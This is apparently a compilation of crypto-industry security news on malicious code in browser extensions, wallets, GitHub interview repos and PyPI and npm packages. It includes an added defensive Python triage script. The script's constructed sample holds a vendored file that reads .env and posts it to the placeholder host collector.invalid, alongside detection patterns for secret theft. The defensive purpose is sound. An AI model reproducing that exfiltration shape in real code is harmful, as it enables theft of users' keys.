Cybersecurity Alert: Malicious Code Found in Popular Browser Extensions
#Cybersecurity #MaliciousCode #BrowserExtensions #PhishingAttack #OAuth2 #Cyberhaven #ProxySwitchyOmega #SecurityAlert #DataBreach #Backdoor
According to PANews, a security alert was issued by AabyssTeam's founder on the X platform, revealing that Cyberhaven, a security company, fell victim to a phishing email attack. This breach led to the insertion of malicious code into their browser extension, aiming to access users' browser cookies and passwords. Further analysis uncovered that multiple browser extensions, including Proxy SwitchyOmega (V3), were compromised. These affected extensions, available on the Google Store, have impacted 500,000 users and are currently under scrutiny. SlowMist founder Yu Jian shared the alert, explaining that the attack utilized an OAuth2 attack chain. By obtaining the 'extension publishing rights' of the 'target browser extension' developers, attackers released updates with backdoors. These updates could be automatically triggered each time the browser is launched or the extension is reopened, making the backdoor difficult to detect.
AdsPower Reports Security Breach Involving Malicious Code
#AdsPower #SecurityBreach #MaliciousCode #CyberSecurity #DataBreach #Hacking #BrowserPlugins #LawEnforcement #Investigation
According to Foresight News, AdsPower has announced a security breach that occurred on the evening of January 24. The company's security team identified an intrusion where hackers disseminated malicious code, leading to the alteration of some third-party browser plugins. The technical team promptly addressed the issue by blocking the distribution channel of the malicious code and removing all potentially risky plugins. AdsPower has officially reported the incident to law enforcement authorities in Singapore and has received a police acknowledgment. The investigation into the breach is ongoing.
Safe Developers' Devices Compromised, Malicious Code Injected
#SafeDevelopers #MaliciousCode #CyberAttack #TransactionSecurity #SlowMist #JavaScript #ByBit #CryptoSecurity
According to Foresight News, SlowMist has reported that the devices of Safe developers were compromised, leading to the injection of malicious code into the front-end. This attack intercepted and altered transaction parameters. Upon swift verification, it was confirmed that the JavaScript files on Safe's front-end contained malicious code. The associated address (0xbdd077f651ebe7f7b3ce16fe5f2b025be2969516) is linked to the malicious execution contract responsible for siphoning off $1.5 billion in assets from ByBit.
Majority Of Stolen Funds In Bybit Hack Remain Traceable
#Bybit #hack #crypto #cryptocurrency #Ethereum #ETH #Bitcoin #BTC #lazarus #funds #blockchain #OTC #P2P #THORChain #maliciouscode #cybersecurity #defi #exchanges #hacking #RUNE
According to CoinDesk, over 77% of the funds stolen in a significant hack on the crypto exchange Bybit remain traceable, while 20% have become untraceable, as reported by CEO Ben Zhou. In an update shared on X early Tuesday, Zhou emphasized the importance of the current and upcoming week for freezing these funds as they begin to clear through exchanges, over-the-counter (OTC) platforms, and peer-to-peer (P2P) networks. The hackers are reportedly attempting to launder the stolen money and convert it into cash.
Approximately 417,348 ether (ETH), valued at around $1 billion, remain traceable on the blockchain after being moved using the privacy-focused THORChain. However, about 20% of the funds, equivalent to roughly 79,655 ETH or $200 million, have "gone dark" through ExCH. A smaller portion, 40,233 ETH or $100 million, passed through OKX's web3 proxy, but 23,553 ETH, worth $65 million, remain untraceable.
Zhou revealed that the hackers converted 83% of the stolen ETH (361,255 ETH, or $900 million) into Bitcoin (BTC), distributing it across 6,954 wallets, with an average of 1.71 BTC per wallet using THORChain. THORChain has processed $4.66 billion in swaps in the week ending March 2, marking the highest tally on record, according to data from DefiLlama, generating over $5.5 million in fees from these illicit flows.
The North Korean hacking group Lazarus targeted Bybit in late February by injecting malicious code into SafeWallet, a third-party wallet platform used by the exchange, to steal billions in customer assets. The attackers compromised a developer's device, allowing them to manipulate a routine wallet transfer and siphon off nearly $1.5 billion in ETH.
Bybit managed to fully restore a 1:1 backing of client assets days after the attack, as previously reported by CoinDesk. Address activity indicates that more than $400 million were purchased through over-the-counter trading, with an additional $300 million acquired directly from exchanges.
Web3 Project Faces USDT Loss Due to Unauthorized Wallet Address
#Web3 #USDT #CryptoSecurity #SmartContracts #Blockchain #AI #MaliciousCode #CryptoCommunity #Investigation
According to BlockBeats, a Web3 startup project has experienced the unauthorized transfer of hundreds of thousands of USDT due to a hard-coded authorized wallet address in its smart contract code. The incident was disclosed by crypto community member Cat (@0xCat_Crypto). A suspicious contract code submitted by an employee is under scrutiny, although the employee denies responsibility, claiming the malicious code was automatically generated by an AI programming assistant without thorough review. Currently, the ownership of the involved wallet and the identity of the code author remain unclear.
SlowMist's Cosine has stated that preliminary investigations have ruled out the possibility of AI-generated malicious code. The investigation involved the use of Cursor and Claude 3.7 models, which showed that the AI auto-completed address did not match the malicious address involved. The malicious address was granted smart contract owner permissions, leading to the complete transfer of project funds.
CoinMarketCap Removes Malicious Code After Security Breach
#CoinMarketCap #SecurityBreach #MaliciousCode #WebsiteSecurity #CryptoSafety #IncidentResponse
According to Odaily, CoinMarketCap announced on the X platform that it has identified and removed malicious code from its website. The team is actively investigating the incident and implementing measures to enhance security. Previously, CoinMarketCap's front end was attacked, resulting in a malicious pop-up window prompting users to 'verify wallet.' CoinMarketCap later tweeted that the malicious code had been removed and all systems were restored to normal, although the tweet was subsequently deleted.
Security Alert: GitHub Project Exploited in Cryptocurrency Theft
#SecurityAlert #GitHub #CryptocurrencyTheft #OpenSource #MaliciousCode #NodeJS #AssetTheft #CyberSecurity #SocialEngineering #SlowMist #Caution #Isolation #PrivateKey #SOL
According to PANews, a security incident involving a GitHub-hosted open-source project has resulted in the theft of cryptocurrency assets. On July 2, a victim reported using the project named zldp2002/solana-pumpfun-bot, which led to the unauthorized access and theft of their digital assets. The SlowMist security team analyzed the attack, revealing that the perpetrators disguised the malicious code as a legitimate open-source project. This deception encouraged users to download and execute the harmful Node.js project, which contained malicious dependencies. As a result, users' wallet private keys were compromised, leading to asset theft.
The attack involved multiple GitHub accounts working in coordination, which expanded the reach and credibility of the malicious project, making it highly deceptive. This type of attack combines social engineering with technical methods, making it challenging to defend against even within organizations.
SlowMist advises developers and users to exercise extreme caution when dealing with unfamiliar GitHub projects, especially those involving wallet or private key operations. It is recommended to run and debug such projects in isolated environments without sensitive data to mitigate risks.
Malicious Code Discovered in GitHub Project Template
#MaliciousCode #GitHub #Cybersecurity #Trojan #Cryptocurrency #Scam #DeveloperCaution #V2EX
According to PANews, a user named evada recently reported on the V2EX website that during a job application process, they were asked to use a GitHub project template provided by the recruiter. It was discovered that the project contained malicious code. Specifically, the logo.png file, which appeared to be an image, actually contained executable code. This code was triggered through the config-overrides.js file with the intent to steal local cryptocurrency private keys.
Evada highlighted that the malicious code sends requests to a specific URL to download a trojan file, which is then set to run automatically at startup, posing significant stealth and danger. V2EX administrator Livid stated that the account involved has been banned, and GitHub has removed the related malicious repository. Several users commented that this new type of scam targeting programmers is highly deceptive, urging developers to exercise caution when running projects from unknown sources.
Web3 Job Scam Alert: Malicious Code Disguised as GitHub Repository
#Web3 #JobScam #CyberSecurity #MaliciousCode #GitHub #Backdoor #DataProtection #ITSecurity #Vigilance #ScamAlert
According to PANews, a recent disclosure by SlowMist highlights a scam involving a purported Web3 team from Ukraine. A community member was asked to clone a GitHub repository during a job interview, which they wisely declined.
The analysis revealed that the repository contained a backdoor. If cloned and executed, it would load malicious code, install harmful dependencies, and steal sensitive browser and wallet data, such as Chrome extension storage and potential mnemonic phrases, leaking them to the attacker's server. This incident underscores the importance of vigilance and the need to avoid running unverified code.
Steam Game BlockBlasters Linked to Malicious Code and Crypto Losses
#BlockBlasters #Steam #maliciouscode #cryptocurrency #crypto #cryptolosses
According to Foresight News, blockchain investigator ZachXBT has reported that the game BlockBlasters on Steam contains malicious code, leading to approximately $150,000 in cryptocurrency losses. The game has been available for download on the Steam platform for over a month.
Web3 Job Seekers Warned of Malicious Code Traps During Interviews
#Web3 #JobSeekers #MaliciousCode #Cybersecurity #SlowMist #Stealer #CryptoWallets #Bitbucket #PrivateKeys #CyberThreats
According to Odaily, Web3 job seekers have been cautioned about potential malicious code traps during interviews. The warning comes from SlowMist's Cosine, who highlighted an incident where attackers impersonated @seracleofficial, instructing candidates to review and execute code hosted on Bitbucket. Once the victims cloned the code, the program immediately scanned all local .env files, stealing private keys and other sensitive information.
SlowMist experts identified this type of backdoor as a typical stealer, capable of collecting passwords saved in browsers, mnemonic phrases, and private keys from crypto wallets. They emphasized the importance of conducting suspicious code reviews in isolated environments to prevent direct execution on real devices, which could lead to attacks.
Security Alert Issued Over Malicious Code in Polymarket Trading Bot
#SecurityAlert #MaliciousCode #Polymarket #TradingBot #Cybersecurity #SlowMist #WalletTheft #GitHub
According to BlockBeats, a security warning has been issued by SlowMist Technology's Chief Information Security Officer, 23pds, regarding a malicious code hidden in a Polymarket trading bot program. The program, known as 'polymarket-copy-trading-bot,' was found to contain code that automatically reads users' '.env' files, which include wallet private keys, leading to potential theft of funds. The developer of this program has repeatedly modified and submitted the code on GitHub, intentionally concealing the malicious package.
GitHub Project Compromised by Malicious Code
#GitHub #MaliciousCode #PolymarketCopyTradingBot #AssetTheft #CyberSecurity #WalletPrivateKeys #Hacker #ExcluderMcpPackage
According to Odaily, the GitHub project known as polymarket-copy-trading-bot has been compromised by malicious code. The program is designed to automatically access the user's .env file upon startup, extracting wallet private keys. These keys are then transmitted to a hacker's server through a concealed malicious dependency package, excluder-mcp-package@1.0.4, resulting in asset theft.
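The interview-repository scams reported by SlowMist and V2EX above and the polymarket-copy-trading-bot item share one shape: a cloned Node.js project that reads .env or wallet storage on startup and ships the contents out through a dependency nobody inspected. The Python script below is an added example, not code from SlowMist, V2EX or any project named on this page. It is a static triage pass a reviewer can run over a cloned directory before `npm install`, flagging install-time lifecycle hooks, secret reads paired with network calls, dynamic code execution markers, and packages sitting under node_modules that package.json never declared. The sample project it writes to a temporary directory is constructed for the demonstration; the `collector.invalid` host and the `helper-pkg` name are placeholders, not indicators from the reports.

```python
"""Pre-execution triage of a cloned Node.js project (added example, not from the page).
Static heuristics only: nothing in the project is executed."""
import json
import re
import tempfile
from dataclasses import dataclass
from pathlib import Path

LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
SOURCE_EXT = {".js", ".cjs", ".mjs", ".ts"}

# (rule name, regex applied to each source line)
LINE_RULES = [
    ("reads-dotenv", re.compile(r"['\"]\.env['\"]|require\(['\"]dotenv['\"]\)|from\s+['\"]dotenv['\"]")),
    ("reads-process-env", re.compile(r"\bprocess\.env\b")),
    ("network-call", re.compile(r"\bfetch\(|\baxios\b|https?\.request\(|\bnet\.connect\(|new\s+WebSocket\(")),
    ("dynamic-exec", re.compile(r"\beval\(|new\s+Function\(|\bchild_process\b|\bexecSync\(")),
    ("base64-blob", re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")),
]


@dataclass(frozen=True)
class Finding:
    rule: str
    path: str   # relative to the project root
    line: int   # 0 when not tied to a single source line
    detail: str


def check_package_json(root: Path) -> list:
    """Flag npm scripts that run automatically during `npm install`."""
    pj = root / "package.json"
    if not pj.is_file():
        return []
    scripts = json.loads(pj.read_text(encoding="utf-8")).get("scripts", {})
    return [Finding("lifecycle-hook", "package.json", 0, f"{hook}: {cmd}")
            for hook, cmd in scripts.items() if hook in LIFECYCLE_HOOKS]


def check_sources(root: Path) -> list:
    """Apply LINE_RULES to every JS/TS file, vendored node_modules included."""
    findings = []
    for path in sorted(root.rglob("*")):
        if path.suffix not in SOURCE_EXT or not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), 1):
            for rule, rx in LINE_RULES:
                if rx.search(line):
                    findings.append(Finding(rule, rel, lineno, line.strip()[:80]))
    return findings


def check_hidden_dependencies(root: Path) -> list:
    """Flag packages under node_modules that package.json never declared: the shape
    of a concealed dependency committed to the repo instead of installed by npm."""
    pj, nm = root / "package.json", root / "node_modules"
    if not pj.is_file() or not nm.is_dir():
        return []
    data = json.loads(pj.read_text(encoding="utf-8"))
    declared = set(data.get("dependencies", {})) | set(data.get("devDependencies", {}))
    return [Finding("undeclared-package", f"node_modules/{p.name}", 0, "not in package.json")
            for p in sorted(nm.iterdir())
            if p.is_dir() and not p.name.startswith(".") and p.name not in declared]


def triage(root: Path) -> list:
    findings = check_package_json(root) + check_sources(root) + check_hidden_dependencies(root)
    # A secret read and a network call in the same file is the stealer shape; escalate it.
    rules_by_file = {}
    for f in findings:
        rules_by_file.setdefault(f.path, set()).add(f.rule)
    for path, rules in rules_by_file.items():
        if rules & {"reads-dotenv", "reads-process-env"} and "network-call" in rules:
            findings.append(Finding("secret-exfil-pattern", path, 0, "reads secrets and calls the network"))
    return findings


def verdict(findings: list) -> str:
    rules = {f.rule for f in findings}
    if rules & {"secret-exfil-pattern", "undeclared-package"}:
        return "DO NOT RUN"
    if rules & {"lifecycle-hook", "dynamic-exec", "base64-blob"}:
        return "REVIEW FIRST"
    return "NO FINDINGS"


def build_sample_project() -> Path:
    """Constructed sample, not a real repository: a postinstall hook runs a hidden
    vendored package (hypothetical 'helper-pkg') that reads .env and posts it to a
    placeholder collector host."""
    root = Path(tempfile.mkdtemp(prefix="triage-"))
    (root / "package.json").write_text(json.dumps({
        "name": "sample-trading-bot",
        "scripts": {"postinstall": "node node_modules/helper-pkg/setup.js"},
        "dependencies": {"dotenv": "^16.0.0"}}))
    (root / "index.js").write_text(
        "require('dotenv').config();\n"
        "const key = process.env.PRIVATE_KEY;  // ordinary-looking config read\n"
        "console.log('bot starting');\n")
    helper = root / "node_modules" / "helper-pkg"
    helper.mkdir(parents=True)
    (helper / "setup.js").write_text(
        "const env = require('fs').readFileSync('.env', 'utf8');\n"
        "fetch('https://collector.invalid/upload', {method: 'POST', body: env});\n")
    return root


if __name__ == "__main__":
    sample = build_sample_project()
    results = triage(sample)
    for f in results:
        print(f"{f.rule:22} {f.path}:{f.line}  {f.detail}")
    print("verdict:", verdict(results))
```

Running the file prints the findings for the constructed sample and the verdict DO NOT RUN; pointing `triage()` at any cloned repository gives the same report. The per-line rules are deliberately noisy (an honest dotenv-based bot trips `reads-dotenv` on its own), so the verdict escalates only when a secret read and a network call share a file or when an undeclared package is present; the "isolated environment, no real keys" advice from the SlowMist items still applies whatever the verdict says.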
Trust Wallet Compensates Users After Security Breach
#TrustWallet #SecurityBreach #APIKeyLeak #MaliciousCode #Compensation #WalletAddresses #AssetsTheft #Sha1HuludAttack #ChromeWebStoreAPI #GitHubCredentials #UserClaims #FixedVersion #WalletSecurity
According to Odaily, a security breach occurred in the Trust Wallet Browser Extension v2.68 between December 24 and 26, 2025, due to an API key leak that led to the upload of malicious code. This incident affected 2,520 wallet addresses, resulting in the theft of approximately $8.5 million in assets. Investigations revealed a connection to the Sha1-Hulud supply chain attack in November, where attackers gained access to the Chrome Web Store API using leaked GitHub credentials.
Trust Wallet has voluntarily decided to compensate affected users and is finalizing the compensation workflow and ownership verification process. The company has begun reaching out to victims who have contacted them officially. Trust Wallet advises affected users to transfer their funds to new wallets immediately and submit claims through the official form. Over 5,000 claims have been received, and the team is reviewing each case individually. Additionally, Trust Wallet has released a fixed version 2.69 and disabled the relevant publishing permissions and credentials.
Trust Wallet Relaunches Chrome Extension and Updates to Version 2.71.0
#TrustWallet #ChromeExtension #Version2.71.0 #CompensationProcess #SecurityIncident #MaliciousCode #Bitcoin #ETH #SOL #CustomerServiceVerification #BTC
According to Odaily, Trust Wallet announced on the X platform that its browser extension is now available again on the Chrome Web Store. Additionally, version 2.71.0 has been released, featuring customer service verification code support to assist with the claims process.
Previously, Trust Wallet initiated a compensation process for victims of a security incident involving its Chrome browser extension. This incident was caused by malicious code embedded in version 2.68 of the software, resulting in the theft of approximately $7 million in assets, including Bitcoin, ETH, and SOL.
Holdstation Faces Supply Chain Attack Resulting in Significant Losses
#supplychainattack #cybersecurity #userfunds #usdt #accountabstraction #maliciouscode #securitybreach #blockchain #bugbounty
Holdstation, a provider of account abstraction solutions, has experienced a supply chain attack, according to ChainCatcher. The attack involved the theft of developer session tokens, allowing the attacker to bypass two-factor authentication and inject malicious code into an application update, leading to the theft of user funds.
The attack resulted in a loss of 462,000 USDT, with the attacker's address identified as 0xcbfA60B39cfAeaE475f649fB6705bD477219bF8d. In response, the Holdstation team has suspended services and pledged to fully compensate affected users. They are collaborating with security teams to investigate the incident and have issued a message on the blockchain, hoping to encourage the attacker to return the funds through a bug bounty program.
Supply Chain Attack Targets PyPI Package LiteLLM with Malicious Code
#SupplyChainAttack #PyPI #LiteLLM #MaliciousCode #CyberSecurity #DataBreach #CloudSecurity #Kubernetes #CryptoSecurity #CI_CD #DatabaseSecurity
A recent supply chain attack has compromised the PyPI package LiteLLM, which is downloaded approximately 97 million times monthly. According to NS3.AI, the malicious version of the package was designed to steal sensitive information, including SSH keys, cloud credentials, Kubernetes files, git credentials, environment variables, cryptocurrency wallets, SSL private keys, CI/CD keys, and database passwords. The attack was short-lived, as the malicious code was available for less than an hour. A bug in the implant led to developer Callum McMahon's machine running out of memory and crashing, inadvertently revealing the attack.
Apifox Desktop Client Faces Supply Chain Attack with Malicious Code Injection
#Apifox #DesktopClient #SupplyChainAttack #MaliciousCode #JavaScript #CredentialTheft #SensitiveDataExposure #RemoteCommandExecution #SecurityBreach #SlowMist #CyberSecurity #APILogs #TokenRevoke #PasswordReset #APIReview
Apifox's desktop client has been targeted in a supply chain attack, according to PANews. The official CDN-hosted front-end script files were injected with highly obfuscated malicious JavaScript code. Users affected by this breach may face risks such as credential theft, sensitive data exposure, and remote command execution, with the malicious code executing automatically and remaining highly concealed.
Security firm SlowMist advises users to immediately revoke all tokens, reset passwords, log out and log back in to invalidate sessions, block the domain *.apifox.it.com, clear local storage, and review API logs and any abnormal activities.